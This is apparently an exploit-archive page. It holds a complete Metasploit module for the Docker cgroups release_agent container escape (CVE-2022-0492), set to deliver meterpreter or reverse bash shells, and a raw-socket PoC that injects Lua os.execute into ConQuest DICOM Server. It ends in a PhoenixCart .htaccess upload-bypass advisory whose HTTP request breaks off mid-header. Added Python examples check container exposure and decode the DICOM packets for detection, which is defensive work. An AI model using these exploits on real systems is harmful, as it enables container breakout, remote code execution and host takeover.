<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Docker cgroups Container Escape',<br /> 'Description' => %q{<br /> This exploit module takes advantage of a Docker container which was started with either the --privileged flag or the SYS_ADMIN Linux capability.<br /> If the host kernel is vulnerable, it's possible to escape the container and achieve root on the host operating system.<br /><br /> A vulnerability was found in the Linux kernel's cgroup_release_agent_write() function in kernel/cgroup/cgroup-v1.c.<br /> This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges<br /> and bypass the namespace isolation unexpectedly.<br /><br /> More simply put, cgroups v1 has a feature called release_agent that runs a program when the last process in a cgroup exits.<br /> If notify_on_release is enabled, the kernel runs the release_agent binary as root in the host's namespaces. By editing the release_agent file,<br /> an attacker can execute their own binary with elevated privileges, taking control of the system. 
However, the release_agent<br /> file is owned by root, so only a user with root access can modify it.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Yiqi Sun', # discovery<br /> 'Kevin Wang', # discovery<br /> 'T1erno', # POC<br /> ],<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'SessionTypes' => ['meterpreter'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> },<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],<br /> [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],<br /> [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],<br /> [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],<br /> [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],<br /> [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],<br /> [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],<br /> [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],<br /> [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],<br /> [ 'CVE', '2022-0492']<br /> ],<br /> 'DisclosureDate' => '2022-02-04',<br /> 'Targets' => [<br /> ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],<br /> ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> 
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> def base_dir<br /> datastore['WritableDir']<br /> end<br /><br /> def check<br /> print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')<br /> release = kernel_release<br /> # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492<br /> release_short = Rex::Version.new(release.split('-').first)<br /> release_long = Rex::Version.new(release.split('-')[0..1].join('-'))<br /> if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10<br /> release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS<br /> release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS<br /> release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM<br /> return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")<br /> end<br /><br /> CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")<br /> end<br /><br /> def exploit<br /> # Check if we're already root as its required<br /> fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?<br /><br /> # create mount<br /> folder = rand_text_alphanumeric(5..10)<br /> @mount_dir = "#{base_dir}/#{folder}"<br /> register_dir_for_cleanup(@mount_dir)<br /> vprint_status("Creating folder for mount: #{@mount_dir}")<br /> mkdir(@mount_dir)<br /> print_status('Mounting cgroup')<br /> cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")<br /> group = rand_text_alphanumeric(5..10)<br /> group_full_dir = "#{@mount_dir}/#{group}"<br /> vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")<br 
/> mkdir(group_full_dir)<br /><br /> print_status("Enabling notify on release for group #{group}")<br /> write_file("#{group_full_dir}/notify_on_release", '1')<br /><br /> print_status('Determining the host OS path for image')<br /> # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of<br /> mtab_file = read_file('/etc/mtab')<br /> host_path = nil<br /> mtab_file.each_line do |line|<br /> next unless line.start_with?('overlay') && line.include?('perdir') # upperdir<br /><br /> line.split(',').each do |parameter|<br /> next unless parameter.start_with?('upperdir')<br /><br /> parameter = parameter.split('=')<br /> fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1<br /> host_path = parameter[1]<br /> end<br /> break<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? 
|| host_path.start_with?('sed') # start_with catches repeat of command<br /><br /> vprint_status("Host OS path for image: #{host_path}")<br /><br /> payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"<br /> print_status("Setting release_agent path to: #{host_path}#{payload_path}")<br /> write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"<br /><br /> print_status("Uploading payload to #{payload_path}")<br /> if target.name == 'CMD'<br /> # for whatever reason it's unhappy and wont run without the /bin/sh header<br /> upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"<br /> elsif target.name == 'BINARY'<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> end<br /> register_files_for_cleanup(payload_path)<br /><br /> print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")<br /> cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))<br /> end<br /><br /> def cleanup<br /> if @mount_dir<br /> vprint_status("Cleanup: Unmounting #{@mount_dir}")<br /> cmd_exec("umount '#{@mount_dir}'")<br /> end<br /> super<br /> end<br />end<br /></code></pre>
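<p>Added example, not part of the Metasploit module above: container-side pre-checks, in Python, for the three things the module depends on before it mounts a cgroup and writes release_agent. It reads the effective capability mask (CapEff, bit 21 is CAP_SYS_ADMIN) from a /proc/&lt;pid&gt;/status dump, compares the ABI number of a uname -r string against the first fixed Ubuntu kernel package that the module's check method lists (so, like that check, the result is only meaningful on Ubuntu kernels; a kernel whose ABI equals the fixed one is reported as not vulnerable), and extracts the overlay upperdir from /etc/mtab, which is the prefix the module puts in front of its payload path. The status and mtab strings are constructed samples; the mask 00000000a80425fb is Docker's default capability set.</p>

```python
"""Container-side pre-checks for the cgroups v1 release_agent escape (added example, not module code)."""
import re

CAP_SYS_ADMIN = 21   # capability bit number from linux/capability.h

# First fixed Ubuntu kernel ABI number per series, taken from the module's check method above.
UBUNTU_FIXED_ABI = {
    (5, 13, 0): 37,    # Ubuntu 21.10:      5.13.0-37.42
    (5, 4, 0): 105,    # Ubuntu 20.04 LTS:  5.4.0-105.119
    (4, 15, 0): 173,   # Ubuntu 18.04 LTS:  4.15.0-173.182
    (4, 4, 0): 222,    # Ubuntu 16.04 ESM:  4.4.0-222.255
}


def has_cap_sys_admin(proc_status: str) -> bool:
    """True when the CapEff mask in a /proc/<pid>/status dump has CAP_SYS_ADMIN set."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", proc_status, re.M)
    if m is None:
        raise ValueError("no CapEff line in status text")
    return ((int(m.group(1), 16) >> CAP_SYS_ADMIN) & 1) == 1


def ubuntu_kernel_vulnerable(release: str):
    """True/False for a uname -r string of a tabulated Ubuntu series, None when the series is unknown."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)-(\d+)", release)
    if m is None:
        return None
    series = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    fixed = UBUNTU_FIXED_ABI.get(series)
    if fixed is None:
        return None
    return int(m.group(4)) < fixed


def overlay_upperdir(mtab: str):
    """upperdir of the container's overlay root mount (the value the module prefixes to its payload path)."""
    for line in mtab.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[2] != "overlay":
            continue
        for opt in fields[3].split(","):
            if opt.startswith("upperdir="):
                return opt[len("upperdir="):]
    return None


def assess(proc_status: str, mtab: str, release: str) -> dict:
    """Combine the three checks; 'exposed' is True only when every precondition the module needs holds."""
    cap = has_cap_sys_admin(proc_status)
    kernel = ubuntu_kernel_vulnerable(release)
    upper = overlay_upperdir(mtab)
    return {"cap_sys_admin": cap, "kernel_vulnerable": kernel, "upperdir": upper,
            "exposed": cap and kernel is True and upper is not None}


# Constructed samples (not captured from a real host). 00000000a80425fb is Docker's default capability set.
STATUS_PRIVILEGED = "Name:\tsh\nCapPrm:\t000001ffffffffff\nCapEff:\t000001ffffffffff\n"
STATUS_DEFAULT = "Name:\tsh\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"
MTAB_SAMPLE = (
    "overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,"
    "upperdir=/var/lib/docker/overlay2/0123abcd/diff,workdir=/var/lib/docker/overlay2/0123abcd/work 0 0\n"
    "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0\n"
)

if __name__ == "__main__":
    import os
    import platform
    status = open("/proc/self/status").read() if os.path.exists("/proc/self/status") else STATUS_DEFAULT
    mtab = open("/etc/mtab").read() if os.path.exists("/etc/mtab") else MTAB_SAMPLE
    print(assess(status, mtab, platform.release()))
```

<p>Run inside the container it reads the live files; a missing CAP_SYS_ADMIN is the cheapest way to rule the technique out, since without it the cgroup mount in the module fails before release_agent is ever touched.</p>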
<pre><code>#!/usr/bin/env python3<br /># ---------------------------------------------------------<br /># preauth rce poc for ConQuest Dicom Server (1.5.0d)<br /># ---------------------------------------------------------<br /># 04.08.2023 @ 22:07 <br /># <br /># code610 blogspot com<br /># <br /><br />import socket<br /><br />target = '192.168.56.106'<br />rport = 5678<br /><br />pkt1 = b"\x01\x00\x00\x00\x00\xd0\x00\x01\x00\x00\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31"<br />pkt1 += b"\x20\x20\x20\x20\x20\x20\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x20\x20\x20\x20"<br />pkt1 += b"\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />pkt1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />pkt1 += b"\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e\x31"<br />pkt1 += b"\x20\x00\x00\x2e\xcb\x00\x00\x00\x30\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31"<br />pkt1 += b"\x40\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x32"<br />pkt1 += b"\x50\x00\x00\x3d"<br />pkt1 += b"\x51\x00\x00\x04\x00\x00\x80\x00"<br />pkt1 += b"\x52\x00\x00\x22\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x36\x38\x30\x30\x34\x33\x2e\x32\x2e\x31\x33\x35\x2e\x31\x30\x36\x36\x2e\x31\x30\x31"<br />pkt1 += b"\x55\x00\x00\x0b\x31\x2e\x35\x2e\x30\x2f\x57\x49\x4e\x33\x32"<br /><br /><br />pkt2 = b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00"<br />pkt2 += b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e"<br />pkt2 += b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00"<br />pkt2 += b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61"<br />pkt2 += b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b"<br 
/>pkt2 += b"\x5b\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x6c\x65\x76\x65"<br />pkt2 += b"\x6c\x3d\x5b\x5b\x50\x41\x54\x49\x45\x4e\x54\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x3d\x7b\x51"<br />pkt2 += b"\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x5b\x5b\x50\x41\x54\x49"<br />pkt2 += b"\x45\x4e\x54\x5d\x5d\x2c\x50\x61\x74\x69\x65\x6e\x74\x49\x44\x3d\x5b\x5b\x5d\x5d\x2c\x50\x61\x74"<br />pkt2 += b"\x69\x65\x6e\x74\x4e\x61\x6d\x65\x3d\x5b\x5b"<br /><br /># super evil command<br /># rce payload: aaaa]],};local t=os.execute("calc");local z{[[<br />pkt3 = b""<br />pkt3 += b"\x61\x61\x61\x61\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x74\x3d\x6f\x73\x2e\x65\x78\x65\x63"<br />pkt3 += b"\x75\x74\x65\x28\x22\x63\x61\x6c\x63\x22\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x20\x41\x3d\x7b\x5b\x5b\x41\x42"<br /><br /><br /><br />pkt4 = b"\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x32\x3d\x44\x69\x63\x6f\x6d\x4f\x62\x6a\x65\x63\x74\x3a\x6e\x65\x77\x28\x29\x3b"<br />pkt4 += b"\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x71\x29\x20\x64\x6f\x20\x71\x32\x5b\x6b\x5d\x3d\x76\x20"<br />pkt4 += b"\x65\x6e\x64\x3b\x6c\x6f\x63\x61\x6c\x20\x72\x32\x3d\x64\x69\x63\x6f\x6d\x71\x75\x65\x72\x79\x28\x61\x65\x2c\x20\x6c\x65\x76\x65"<br />pkt4 += b"\x6c\x2c\x20\x71\x32\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x73\x3d\x74\x65\x6d\x70\x66\x69\x6c\x65\x28\x22\x74\x78\x74\x22\x29\x20\x66"<br />pkt4 += b"\x3d\x69\x6f\x2e\x6f\x70\x65\x6e\x28\x73\x2c\x20\x22\x77\x62\x22\x29\x3b\x69\x66\x20\x72\x32\x3d\x3d\x6e\x69\x6c\x20\x74\x68\x65"<br />pkt4 += b"\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x6e\x6f\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x22\x2e"<br />pkt4 += b"\x2e\x61\x65\x2e\x2e\x22\x5c\x6e\x22\x29\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28"<br />pkt4 += 
b"\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x65\x6e\x64\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x72\x20\x3d\x20\x6c\x6f\x61\x64\x73\x74\x72\x69"<br />pkt4 += b"\x6e\x67\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x22\x2e\x2e\x72\x32\x3a\x53\x65\x72\x69\x61\x6c\x69\x7a\x65\x28\x29\x29\x28\x29\x3b"<br />pkt4 += b"\x72\x5b\x31\x5d\x2e\x51\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x6e\x69\x6c\x3b\x20\x72\x5b\x31"<br />pkt4 += b"\x5d\x2e\x54\x72\x61\x6e\x73\x66\x65\x72\x53\x79\x6e\x74\x61\x78\x55\x49\x44\x3d\x6e\x69\x6c\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x6b"<br />pkt4 += b"\x65\x79\x73\x3d\x7b\x7d\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x72\x5b\x31\x5d\x29\x20\x64\x6f"<br /><br />pkt5 = b""<br />pkt5 += b"\x20\x69\x66\x20\x74\x79\x70\x65\x28\x76\x29\x7e\x3d\x22\x74\x61\x62\x6c\x65\x22\x20\x74\x68\x65\x6e\x20\x6b\x65\x79\x73\x5b\x23"<br />pkt5 += b"\x6b\x65\x79\x73\x2b\x31\x5d\x3d\x6b\x20\x65\x6e\x64\x20\x65\x6e\x64\x3b\x20\x74\x61\x62\x6c\x65\x2e\x73\x6f\x72\x74\x28\x6b\x65"<br />pkt5 += b"\x79\x73\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x61\x2c\x20\x62\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x73\x74\x72\x69\x6e\x67"<br />pkt5 += b"\x2e\x73\x75\x62\x28\x61\x2c\x20\x31\x2c\x20\x37\x29\x3c\x73\x74\x72\x69\x6e\x67\x2e\x73\x75\x62\x28\x62\x2c\x20\x31\x2c\x20\x37"<br />pkt5 += b"\x29\x20\x65\x6e\x64\x29\x3b\x20\x69\x66\x20\x66\x69\x72\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e"<br />pkt5 += b"\x20\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x76\x2e\x2e\x22\x20\x20\x20"<br />pkt5 += b"\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x69\x66\x20\x66\x69\x72"<br />pkt5 += b"\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += 
b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x66\x6f\x72\x20\x6b\x2c\x76"<br />pkt5 += b"\x20\x69\x6e\x20\x69\x70\x61\x69\x72\x73\x28\x72\x29\x20\x64\x6f\x20\x20\x20\x66\x6f\x72\x20\x6b\x32\x2c\x76\x32\x20\x69\x6e\x20"<br />pkt5 += b"\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5b\x22\x2e\x2e\x76\x5b\x76"<br />pkt5 += b"\x32\x5d\x2e\x2e\x22\x5d\x20\x20\x20\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65"<br />pkt5 += b"\x6e\x64\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28\x29\x3b"<br /><br /><br />with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:<br /> print("+ connecting to target...")<br /> s.connect(( target, rport ))<br /> print("+ connected!")<br /><br /> print("+ sending pkt1...")<br /> #s.sendall( pkt1 ) <br /> #data1 = s.recv(1024)<br /> #print("+ recv pkt1:\n%s" % data1)<br /><br /> #print("Data received:\n%s" % data1 )<br /><br /> print("+ sending 2nd and more pkts...")<br /> #s.sendall( pkt2 ) <br /> #s.sendall( pkt3 ) <br /> #s.sendall( pkt3 ) <br /> #s.sendall( pkt5 ) <br /><br /> allpkts = pkt1 + pkt2 + pkt3 + pkt4 + pkt5<br /> s.sendall(allpkts)<br /><br /><br /> print("! should be done :|")<br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>
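<p>The PoC above is a fixed byte string, so what it actually sends is not obvious. The following is an added example, not the PoC author's code, that decodes it. Reading the bytes: pkt2 is a DICOM P-DATA-TF PDU (type 0x04, length 0x492) with one PDV (length 0x48e) on presentation context 0xcb, message control header 0x03 (command, last fragment), holding an implicit VR little endian command set: group length 0x38, Affected SOP Class 1.2.840.10008.1.1 (Verification), CommandField 0x0030 (C-ECHO-RQ), MessageID 7, CommandDataSetType 0x0101 (no data set), then a private element (9999,0400) of declared length 0x440 whose value starts with "lua:" and continues, across pkt3 to pkt5, with the Lua script quoted in the PoC's comments. The parser below lists those elements and flags a value shorter than its declared length (PAGE_PKT2_PREFIX is the first 120 bytes of pkt2 copied from the PoC and cut there); the builder reproduces the same layout from a script so the two can be cross-checked. The round-trip script is constructed and harmless.</p>

```python
"""Decode/encode the DICOM P-DATA-TF PDU layout used by the ConQuest PoC above (added example)."""

PDU_P_DATA_TF = 0x04
TAG_PRIVATE_SCRIPT = (0x9999, 0x0400)          # private tag carrying the "lua:" script in the PoC
VERIFICATION_SOP = b"1.2.840.10008.1.1\x00"   # NUL-padded to even length, as in the PoC bytes
CMD_C_ECHO_RQ = 0x0030

# First 120 bytes of pkt2 from the PoC above (copied, then cut): PDU header, command set, start of script.
PAGE_PKT2_PREFIX = (
    b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00"
    b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e"
    b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00"
    b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61"
    b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b"
)


def _le(n: int, width: int) -> bytes:
    return n.to_bytes(width, "little")


def _element(group: int, elem: int, value: bytes) -> bytes:
    """Implicit VR little endian data element: 16-bit group, 16-bit element, 32-bit length, value."""
    return _le(group, 2) + _le(elem, 2) + _le(len(value), 4) + value


def build_echo_with_script(script: bytes, ctx_id: int = 0xCB, msg_id: int = 7) -> bytes:
    """Build the same PDU shape as pkt2: C-ECHO-RQ command set plus private element (9999,0400)."""
    if len(script) % 2:
        script += b" "                          # DICOM values have even length; Lua ignores the space
    group0 = (
        _element(0x0000, 0x0002, VERIFICATION_SOP)          # AffectedSOPClassUID
        + _element(0x0000, 0x0100, _le(CMD_C_ECHO_RQ, 2))   # CommandField
        + _element(0x0000, 0x0110, _le(msg_id, 2))          # MessageID
        + _element(0x0000, 0x0800, _le(0x0101, 2))          # CommandDataSetType: no data set follows
    )
    body = (_element(0x0000, 0x0000, _le(len(group0), 4))   # CommandGroupLength
            + group0 + _element(*TAG_PRIVATE_SCRIPT, script))
    # PDV item: 32-bit length, presentation context id, message control header 0x03 (command, last fragment)
    pdv = (len(body) + 2).to_bytes(4, "big") + bytes([ctx_id, 0x03]) + body
    return bytes([PDU_P_DATA_TF, 0x00]) + len(pdv).to_bytes(4, "big") + pdv


def parse_pdata_tf(pdu: bytes) -> dict:
    """Parse one P-DATA-TF PDU with a single PDV; tolerates a capture cut short of the declared lengths."""
    if len(pdu) < 12 or pdu[0] != PDU_P_DATA_TF:
        raise ValueError("not a P-DATA-TF PDU")
    pdu_len = int.from_bytes(pdu[2:6], "big")
    pdv_len = int.from_bytes(pdu[6:10], "big")
    body = pdu[12:12 + pdv_len - 2]             # shorter than declared when the input is truncated
    elements, off = [], 0
    while off + 8 <= len(body):
        group = int.from_bytes(body[off:off + 2], "little")
        elem = int.from_bytes(body[off + 2:off + 4], "little")
        vlen = int.from_bytes(body[off + 4:off + 8], "little")
        value = body[off + 8:off + 8 + vlen]
        elements.append({"tag": (group, elem), "declared_len": vlen,
                         "value": value, "truncated": len(value) < vlen})
        off += 8 + vlen
    return {"pdu_length": pdu_len, "pdv_length": pdv_len, "context_id": pdu[10],
            "message_control": pdu[11], "elements": elements}


def extract_script(parsed: dict):
    """Return (script_text, truncated) from the private element, or None if it is absent."""
    for el in parsed["elements"]:
        if el["tag"] == TAG_PRIVATE_SCRIPT and el["value"].startswith(b"lua:"):
            return el["value"][4:].decode("latin-1"), el["truncated"]
    return None


if __name__ == "__main__":
    for el in parse_pdata_tf(PAGE_PKT2_PREFIX)["elements"]:
        print("(%04x,%04x) len=%d truncated=%s %r" % (*el["tag"], el["declared_len"], el["truncated"], el["value"][:32]))
```

<p>For detection the useful property is in the bytes, not the script text: a C-ECHO-RQ command set is only supposed to contain group 0000 elements, so a command PDV on the Verification SOP class that carries a (9999,xxxx) private element, let alone one starting with "lua:", is a simple, low false-positive signature for this PoC.</p>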
<pre><code>## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE<br />## Author: nu11secur1ty<br />## Date: 12/06/2023<br />## Vendor: https://phoenixcart.org/index.php<br />## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip<br />## Reference: https://portswigger.net/web-security/file-upload,<br />https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload<br /><br />## Description:<br />The Categories/Products "Product Images" upload function does not restrict the<br />name or the extension of uploaded files. An authenticated administrator (the<br />request below carries a cepcAdminID session cookie) can upload a file named<br />.htaccess into the images directory, replacing the shipped one that denies<br />access to script files: the uploaded copy comments out "Require all denied"<br />and sets "Allow from all". An info.php file uploaded the same way is then<br />executed by the web server from anywhere and dumps information about the<br />server. This can be done on the demo server; please do not do this.<br />I am a Penetration Tester, not a stupid cracker, and that's why I downloaded it,<br />installed it, and tested it!<br />If you want to test it yourself, please download it, install it, and test it!<br />Thank you all!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br />[+]Exploit execution:<br />```HTTP<br />POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1<br />Host: pwnedhost7.com<br />Content-Length: 2952<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://pwnedhost7.com<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: 
